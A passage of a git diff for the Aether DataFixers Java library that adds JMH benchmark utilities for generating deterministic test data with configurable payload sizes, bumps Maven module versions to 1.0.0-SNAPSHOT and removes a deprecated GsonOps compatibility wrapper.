CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.dynamic.DynamicOps; +import de.splatgames.aether.datafixers.testkit.TestData; +import de.splatgames.aether.datafixers.testkit.TestDataBuilder; +import org.jetbrains.annotations.NotNull; + +/** + * Factory for generating benchmark test data with configurable complexity. + * + *

This utility class creates {@link Dynamic} objects of varying sizes and + * structures for use in JMH benchmarks. Data generation is format-agnostic, working with any {@link DynamicOps} + * implementation.

+ * + *

Data Generation Methods

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
MethodStructureUse Case
{@link #generate(DynamicOps, PayloadSize)}Complex (fields + nesting + lists)General-purpose benchmarks
{@link #generatePlayerData(DynamicOps)}Domain-specific (player data)Realistic migration scenarios
{@link #generateFlat(DynamicOps, int)}Flat object (fields only)Basic operation benchmarks
+ * + *

Generated Data Structure

+ *

The main {@link #generate(DynamicOps, PayloadSize)} method creates objects with:

+ *
{@code
+ * {
+ *   "stringField0": "value0",
+ *   "intField0": 0,
+ *   "boolField0": true,
+ *   "stringField1": "value1",
+ *   ...
+ *   "nested": {
+ *     "level": 4,
+ *     "data": "nested-level-4",
+ *     "timestamp": 1234567890,
+ *     "child": {
+ *       "level": 3,
+ *       ...
+ *     }
+ *   },
+ *   "items": [
+ *     {"id": "item-0", "quantity": 1, "active": true},
+ *     {"id": "item-1", "quantity": 2, "active": false},
+ *     ...
+ *   ]
+ * }
+ * }
+ * + *

Design Considerations

+ *
    + *
  • Testkit integration: Uses {@link TestDataBuilder} for fluent, + * type-safe data construction
  • + *
  • Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
  • + *
  • Deterministic: Generated data is fully reproducible for benchmark consistency
  • + *
  • Configurable complexity: {@link PayloadSize} controls data volume
  • + *
+ * + *

Usage Example

+ *
{@code
+ * // In a JMH benchmark
+ * @Setup(Level.Iteration)
+ * public void setup() {
+ *     // Generate medium-complexity test data
+ *     this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
+ *
+ *     // Or generate player-specific data
+ *     this.playerData = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+ * }
+ * }
+ * + * @author Erik Pförtner + * @see PayloadSize + * @see BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.testkit.TestDataBuilder + * @since 1.0.0 + */ +public final class BenchmarkDataGenerator { + + /** + * Fixed timestamp value used for deterministic benchmark data generation. + * + *

Using a constant timestamp ensures reproducible benchmark results + * across different runs, eliminating variability from system time.

+ */ + private static final long FIXED_TIMESTAMP = 1704067200000L; // 2024-01-01 00:00:00 UTC + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkDataGenerator() { + // Utility class + } + + /** + * Generates benchmark data with the specified payload size and complexity. + * + *

Creates a complex object structure including:

+ *
    + *
  • Primitive fields: String, integer, and boolean fields based on + * {@link PayloadSize#getFieldCount()}
  • + *
  • Nested objects: Recursive nesting up to + * {@link PayloadSize#getNestingDepth()} levels
  • + *
  • List with items: An "items" array with + * {@link PayloadSize#getListSize()} objects
  • + *
+ * + *

Field Naming Patterns

+ * + * + * + * + * + *
Field TypePatternExample
String{@code stringFieldN}{@code stringField0: "value0"}
Integer{@code intFieldN}{@code intField0: 0}
Boolean{@code boolFieldN}{@code boolField0: true}
+ * + * @param ops the DynamicOps implementation to use for data creation + * @param size the payload size configuration controlling data complexity + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing the generated benchmark data + */ + @NotNull + public static Dynamic generate(@NotNull final DynamicOps ops, + @NotNull final PayloadSize size) { + final TestDataBuilder builder = TestData.using(ops).object(); + + // Add primitive fields + for (int i = 0; i < size.getFieldCount(); i++) { + builder.put("stringField" + i, "value" + i); + builder.put("intField" + i, i * 100); + builder.put("boolField" + i, i % 2 == 0); + } + + // Add nested objects + addNestedObject(builder, "nested", size.getNestingDepth()); + + // Add list with items + builder.putList("items", list -> { + for (int i = 0; i < size.getListSize(); i++) { + final int index = i; + list.addObject(item -> item + .put("id", "item-" + index) + .put("quantity", index + 1) + .put("active", index % 3 == 0)); + } + }); + + return builder.build(); + } + + /** + * Generates a player-like data structure for realistic migration benchmarks. + * + *

Creates a structure simulating game player data, useful for domain-specific + * migration testing with {@link BenchmarkBootstrap#createPlayerFixer()}.

+ * + *

Generated Structure

+ *
{@code
+     * {
+     *   "id": "player-benchmark-12345",
+     *   "name": "BenchmarkPlayer",
+     *   "level": 50,
+     *   "experience": 125000,
+     *   "health": 100.0,
+     *   "active": true,
+     *   "position": {"x": 100.5, "y": 64.0, "z": -200.25, "world": "overworld"},
+     *   "stats": {"strength": 15, "agility": 12, "intelligence": 18, "luck": 7},
+     *   "inventory": [{"slot": 0, "itemId": "minecraft:item_0", "count": 1, "damage": 0}, ...],
+     *   "achievements": ["first_login", "level_10", "level_25", "level_50", ...]
+     * }
+     * }
+ * + *

Data Characteristics

+ * + * + * + * + * + * + *
ComponentCountDescription
Top-level fields6id, name, level, experience, health, active
Nested objects2position (4 fields), stats (4 fields)
Inventory slots36Standard inventory size
Achievements6String list
+ * + * @param ops the DynamicOps implementation to use for data creation + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing player-like benchmark data + * @see BenchmarkBootstrap#createPlayerFixer() + * @see BenchmarkBootstrap#PLAYER_TYPE + */ + @NotNull + public static Dynamic generatePlayerData(@NotNull final DynamicOps ops) { + return TestData.using(ops) + .object() + .put("id", "player-benchmark-12345") + .put("name", "BenchmarkPlayer") + .put("level", 50) + .put("experience", 125000L) + .put("health", 100.0) + .put("active", true) + .putObject("position", pos -> pos + .put("x", 100.5) + .put("y", 64.0) + .put("z", -200.25) + .put("world", "overworld")) + .putObject("stats", stats -> stats + .put("strength", 15) + .put("agility", 12) + .put("intelligence", 18) + .put("luck", 7)) + .putList("inventory", inv -> { + for (int i = 0; i < 36; i++) { + final int slot = i; + inv.addObject(item -> item + .put("slot", slot) + .put("itemId", "minecraft:item_" + slot) + .put("count", (slot % 64) + 1) + .put("damage", 0)); + } + }) + .putList("achievements", list -> list + .add("first_login") + .add("level_10") + .add("level_25") + .add("level_50") + .add("explorer") + .add("master_crafter")) + .build(); + } + + /** + * Generates a simple flat object with only string fields. + * + *

Creates a minimal object structure without nesting or lists, useful for + * benchmarking basic field access and manipulation operations with minimal traversal overhead.

+ * + *

Generated Structure

+ *
{@code
+     * {
+     *   "field0": "value0",
+     *   "field1": "value1",
+     *   "field2": "value2",
+     *   ...
+     * }
+     * }
+ * + *

This method is useful for isolating field operation costs from + * structural complexity overhead.

+ * + * @param ops the DynamicOps implementation to use for data creation + * @param fieldCount the number of string fields to generate (field0 through field(n-1)) + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing a flat object with string fields + */ + @NotNull + public static Dynamic generateFlat(@NotNull final DynamicOps ops, + final int fieldCount) { + final TestDataBuilder builder = TestData.using(ops).object(); + for (int i = 0; i < fieldCount; i++) { + builder.put("field" + i, "value" + i); + } + return builder.build(); + } + + /** + * Recursively adds nested object structures to the builder. + * + *

Creates a chain of nested objects, each containing:

+ *
    + *
  • {@code level} - the current nesting depth
  • + *
  • {@code data} - a string identifying the nesting level
  • + *
  • {@code timestamp} - fixed timestamp for reproducibility
  • + *
  • {@code child} - the next nested level (if depth > 0)
  • + *
+ * + * @param builder the TestDataBuilder to add the nested structure to + * @param key the field name for this nested object + * @param depth remaining nesting levels (stops when depth reaches 0) + * @param the underlying value type of the builder + */ + private static void addNestedObject(final TestDataBuilder builder, + final String key, + final int depth) { + if (depth <= 0) { + return; + } + builder.putObject(key, nested -> { + nested.put("level", depth); + nested.put("data", "nested-level-" + depth); + nested.put("timestamp", FIXED_TIMESTAMP); + addNestedObject(nested, "child", depth - 1); + }); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java new file mode 100644 index 0000000..13b56f3 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java @@ -0,0 +1,208 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +/** + * Defines payload size configurations for benchmark test data generation. + * + *

This enum controls the complexity of data generated by + * {@link BenchmarkDataGenerator#generate(de.splatgames.aether.datafixers.api.dynamic.DynamicOps, PayloadSize)}. + * Each configuration specifies three dimensions of data complexity:

+ * + *
    + *
  • Field count: Number of primitive fields (string, int, boolean triplets)
  • + *
  • Nesting depth: Levels of nested object recursion
  • + *
  • List size: Number of items in the generated list
  • + *
+ * + *

Configuration Summary

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
SizeFieldsNestingList ItemsUse Case
{@link #SMALL}52 levels10Quick iterations, CI pipelines
{@link #MEDIUM}204 levels100Typical performance testing
{@link #LARGE}506 levels1000Stress testing, worst-case analysis
+ * + *

JMH Parameterization

+ *

This enum is designed for use with JMH's {@code @Param} annotation:

+ *
{@code
+ * @Param({"SMALL", "MEDIUM", "LARGE"})
+ * private PayloadSize payloadSize;
+ *
+ * @Setup(Level.Iteration)
+ * public void setup() {
+ *     this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, payloadSize);
+ * }
+ * }
+ * + *

Memory and Performance Impact

+ *

Approximate data characteristics for each size:

+ * + * + * + * + * + *
Size~JSON Size~Object CountTypical Latency
SMALL~2 KB~50Sub-millisecond
MEDIUM~20 KB~500Low milliseconds
LARGE~200 KB~5000Tens of milliseconds
+ * + * @author Erik Pförtner + * @see BenchmarkDataGenerator + * @since 1.0.0 + */ +public enum PayloadSize { + + /** + * Small payload configuration for quick benchmark iterations. + * + *

Generates minimal data suitable for:

+ *
    + *
  • Rapid development feedback loops
  • + *
  • CI/CD pipeline validation
  • + *
  • Baseline measurements with minimal GC impact
  • + *
+ * + *

Configuration: 5 fields, 2 nesting levels, 10 list items

+ */ + SMALL(5, 2, 10), + + /** + * Medium payload configuration for balanced performance testing. + * + *

Generates moderately complex data suitable for:

+ *
    + *
  • Standard benchmark runs
  • + *
  • Typical real-world data volume simulation
  • + *
  • Comparing different implementations
  • + *
+ * + *

Configuration: 20 fields, 4 nesting levels, 100 list items

+ */ + MEDIUM(20, 4, 100), + + /** + * Large payload configuration for stress testing and worst-case analysis. + * + *

Generates substantial data suitable for:

+ *
    + *
  • Memory pressure and GC behavior analysis
  • + *
  • Worst-case performance scenarios
  • + *
  • Scalability limit identification
  • + *
+ * + *

Configuration: 50 fields, 6 nesting levels, 1000 list items

+ * + *

Note: Large payloads may require increased heap size and longer + * warmup periods for stable measurements.

+ */ + LARGE(50, 6, 1000); + + /** + * Number of primitive field triplets (string, int, boolean) to generate. + */ + private final int fieldCount; + + /** + * Maximum depth of nested object recursion. + */ + private final int nestingDepth; + + /** + * Number of items in the generated list. + */ + private final int listSize; + + /** + * Constructs a payload size configuration. + * + * @param fieldCount number of top-level field triplets + * @param nestingDepth maximum nesting levels for nested objects + * @param listSize number of items in generated lists + */ + PayloadSize(final int fieldCount, final int nestingDepth, final int listSize) { + this.fieldCount = fieldCount; + this.nestingDepth = nestingDepth; + this.listSize = listSize; + } + + /** + * Returns the number of primitive field triplets to generate. + * + *

Each field "count" results in three actual fields:

+ *
    + *
  • {@code stringFieldN} - String value
  • + *
  • {@code intFieldN} - Integer value
  • + *
  • {@code boolFieldN} - Boolean value
  • + *
+ * + * @return the number of field triplets (total fields = fieldCount × 3) + */ + public int getFieldCount() { + return this.fieldCount; + } + + /** + * Returns the maximum nesting depth for recursive nested objects. + * + *

A depth of N creates N levels of nested objects, each containing + * a "child" field pointing to the next level until depth reaches 0.

+ * + * @return the maximum nesting depth (0 = no nesting) + */ + public int getNestingDepth() { + return this.nestingDepth; + } + + /** + * Returns the number of items to generate in the "items" list. + * + *

Each item is an object with id, quantity, and active fields.

+ * + * @return the number of list items + */ + public int getListSize() { + return this.listSize; + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java new file mode 100644 index 0000000..5673ed4 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java @@ -0,0 +1,138 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Utility classes for JMH benchmark infrastructure in the Aether DataFixers framework. + * + *

This package provides the foundational components that all benchmark classes depend on + * for test data generation, DataFixer configuration, and payload management. These utilities + * ensure consistent, reproducible benchmark conditions across different benchmark categories.

+ * + *

Package Contents

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ClassPurposeUsed By
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap}Factory for pre-configured DataFixer instancesAll migration benchmarks
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator}Factory for generating test data with configurable complexityAll benchmarks requiring input data
{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize}Configuration enum for data complexity levelsJMH {@code @Param} annotations
+ * + *

Design Principles

+ *
    + *
  • Isolation: Utilities are stateless and thread-safe for concurrent benchmark use
  • + *
  • Consistency: All benchmarks use the same data generation logic for fair comparisons
  • + *
  • Configurability: {@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} + * allows parameterized benchmarks with different data volumes
  • + *
  • No-op context: All DataFixers use {@code NoOpDataFixerContext} to eliminate + * logging overhead during measurements
  • + *
+ * + *

Typical Usage Pattern

+ *
{@code
+ * @State(Scope.Benchmark)
+ * public class MyBenchmark {
+ *
+ *     @Param({"SMALL", "MEDIUM", "LARGE"})
+ *     private PayloadSize payloadSize;
+ *
+ *     private DataFixer fixer;
+ *     private Dynamic input;
+ *
+ *     @Setup(Level.Trial)
+ *     public void setupTrial() {
+ *         // Create fixer once per trial
+ *         this.fixer = BenchmarkBootstrap.createChainFixer(10);
+ *     }
+ *
+ *     @Setup(Level.Iteration)
+ *     public void setupIteration() {
+ *         // Regenerate data each iteration for consistent GC behavior
+ *         this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, payloadSize);
+ *     }
+ *
+ *     @Benchmark
+ *     public void migrate(Blackhole blackhole) {
+ *         Dynamic result = fixer.update(
+ *             BenchmarkBootstrap.BENCHMARK_TYPE,
+ *             input,
+ *             new DataVersion(1),
+ *             new DataVersion(11)
+ *         );
+ *         blackhole.consume(result);
+ *     }
+ * }
+ * }
+ * + *

Data Fixer Configurations

+ *

{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} provides + * several DataFixer configurations for different benchmark scenarios:

+ * + * + * + * + * + * + * + *
ConfigurationFix CountPurpose
Single Fix1Baseline single-operation performance
Identity1 (no-op)Framework overhead measurement
Chain (N)1-100Chain length scaling analysis
Mixed (N)4+Realistic heterogeneous migrations
Player4Domain-specific scenario testing
+ * + *

Payload Size Configurations

+ *

{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} defines three + * complexity levels for generated test data:

+ * + * + * + * + * + *
SizeFieldsNestingList ItemsUse Case
SMALL5210Quick iterations, CI
MEDIUM204100Standard testing
LARGE5061000Stress testing
+ * + *

Integration with Testkit

+ *

This package builds upon the {@code aether-datafixers-testkit} module:

+ *
    + *
  • {@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator} uses + * {@code TestDataBuilder} for fluent data construction
  • + *
  • {@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} uses + * {@code QuickFix} for efficient fix creation
  • + *
  • Both utilities leverage {@code MockSchemas} for lightweight schema instances
  • + *
+ * + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator + * @see de.splatgames.aether.datafixers.benchmarks.util.PayloadSize + * @see de.splatgames.aether.datafixers.testkit + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.util; diff --git a/aether-datafixers-bom/pom.xml b/aether-datafixers-bom/pom.xml index e736522..e8627a7 100644 --- a/aether-datafixers-bom/pom.xml +++ b/aether-datafixers-bom/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-bom diff --git a/aether-datafixers-cli/pom.xml b/aether-datafixers-cli/pom.xml index 2b8a30e..a54c951 100644 --- a/aether-datafixers-cli/pom.xml +++ b/aether-datafixers-cli/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-cli @@ -180,7 +180,7 @@ org.codehaus.mojo exec-maven-plugin - 3.1.0 + 3.6.3 ${main.class} diff --git a/aether-datafixers-codec/pom.xml b/aether-datafixers-codec/pom.xml index 5d48923..f0b96d8 100644 --- a/aether-datafixers-codec/pom.xml +++ b/aether-datafixers-codec/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-codec diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java deleted file mode 100644 index 55df6ee..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java +++ /dev/null @@ -1,737 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -package de.splatgames.aether.datafixers.codec.gson; - -import com.google.common.base.Preconditions; -import com.google.gson.JsonArray; -import com.google.gson.JsonElement; -import com.google.gson.JsonNull; -import com.google.gson.JsonObject; -import com.google.gson.JsonPrimitive; -import de.splatgames.aether.datafixers.api.dynamic.DynamicOps; -import de.splatgames.aether.datafixers.api.result.DataResult; -import de.splatgames.aether.datafixers.api.util.Pair; -import org.jetbrains.annotations.NotNull; -import org.jspecify.annotations.Nullable; - -import java.util.stream.Stream; - -/** - * Backwards-compatibility wrapper for {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}. - * - *

This class provides API compatibility for code written against the pre-0.4.0 package structure. - * It delegates all operations to the new {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} - * implementation in the reorganized package hierarchy.

- * - *

Migration Guide

- *

To migrate to the new API, update your imports:

- *
{@code
- * // Old import (deprecated)
- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }
- * - *

Removal Timeline

- *

This class is scheduled for removal in version 1.0.0. All functionality remains - * fully operational until removal, but users should migrate to the new package structure - * at their earliest convenience.

- * - *

Delegation Pattern

- *

This wrapper implements the delegation pattern, forwarding all method calls to the - * underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance. - * This ensures identical behavior between the deprecated and new implementations.

- * - *

Thread Safety

- *

This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared - * across multiple threads, as the underlying implementation is also thread-safe.

- * - * @author Erik Pförtner - * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps - * @see DynamicOps - * @since 0.1.0 - * @deprecated Since 0.4.0. Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} - * from the {@code codec.json.gson} package instead. This class will be removed - * in version 1.0.0 as part of the package reorganization. - */ -@Deprecated(forRemoval = true, since = "0.4.0") -public class GsonOps implements DynamicOps { - - /** - * The singleton instance of the deprecated {@code GsonOps} wrapper. - * - *

This instance wraps {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE} - * and provides full backwards compatibility. It is thread-safe and can be shared across - * the entire application.

- * - *

Migration

- *

Replace usages with:

- *
{@code
-     * // Old usage (deprecated)
-     * GsonOps.INSTANCE
-     *
-     * // New usage (recommended)
-     * de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
-     * }
- * - * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE} instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - public static final GsonOps INSTANCE = new GsonOps(de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE); - - /** - * The underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance - * to which all operations are delegated. - * - *

This field holds the actual implementation that performs all DynamicOps operations. - * The wrapper simply forwards all method calls to this instance, ensuring behavioral - * equivalence between the deprecated and new implementations.

- */ - private final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps; - - /** - * Creates a new deprecated {@code GsonOps} wrapper delegating to the specified base implementation. - * - *

This constructor allows wrapping any {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} - * instance, though typically the singleton {@link #INSTANCE} should be used instead.

- * - *

Usage

- *
{@code
-     * // Typically use the singleton instead
-     * GsonOps ops = GsonOps.INSTANCE;
-     *
-     * // Or wrap a custom instance if needed
-     * GsonOps customOps = new GsonOps(
-     *     de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
-     * );
-     * }
- * - * @param baseOps the base {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} - * instance to delegate all operations to; must not be {@code null} - * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} directly instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - private GsonOps(@NotNull final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps) { - Preconditions.checkNotNull(baseOps, "baseOps must not be null"); - this.baseOps = baseOps; - } - - // ==================== Empty/Null Values ==================== - - /** - * {@inheritDoc} - * - *

Returns the canonical empty/null representation for Gson JSON data, - * which is {@link JsonNull#INSTANCE}. This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#empty()} method.

- * - * @return {@link JsonNull#INSTANCE} representing the absence of a value - */ - @NotNull - @Override - public JsonElement empty() { - return this.baseOps.empty(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON object ({@code {}}). This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyMap()} method.

- * - * @return a new empty {@link JsonObject} instance - */ - @NotNull - @Override - public JsonElement emptyMap() { - return this.baseOps.emptyMap(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON array ({@code []}). This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyList()} method.

- * - * @return a new empty {@link JsonArray} instance - */ - @NotNull - @Override - public JsonElement emptyList() { - return this.baseOps.emptyList(); - } - - // ==================== Type Checking ==================== - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a map/object structure. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isMap(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonObject}, {@code false} otherwise - */ - @Override - public boolean isMap(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isMap(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a list/array structure. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isList(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonArray}, {@code false} otherwise - */ - @Override - public boolean isList(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isList(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a string primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isString(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a string, - * {@code false} otherwise - */ - @Override - public boolean isString(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isString(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a numeric primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isNumber(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a number, - * {@code false} otherwise - */ - @Override - public boolean isNumber(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isNumber(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a boolean primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isBoolean(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a boolean, - * {@code false} otherwise - */ - @Override - public boolean isBoolean(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isBoolean(value); - } - - // ==================== Primitive Creation ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON string primitive from the given string value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createString(String)} method.

- * - * @param value the string value to wrap; must not be {@code null} - * @return a new {@link JsonPrimitive} containing the string - */ - @NotNull - @Override - public JsonElement createString(@NotNull final String value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createString(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given integer value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createInt(int)} method.

- * - * @param value the integer value to wrap - * @return a new {@link JsonPrimitive} containing the integer - */ - @NotNull - @Override - public JsonElement createInt(final int value) { - return this.baseOps.createInt(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given long value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createLong(long)} method.

- * - * @param value the long value to wrap - * @return a new {@link JsonPrimitive} containing the long - */ - @NotNull - @Override - public JsonElement createLong(final long value) { - return this.baseOps.createLong(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given float value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createFloat(float)} method.

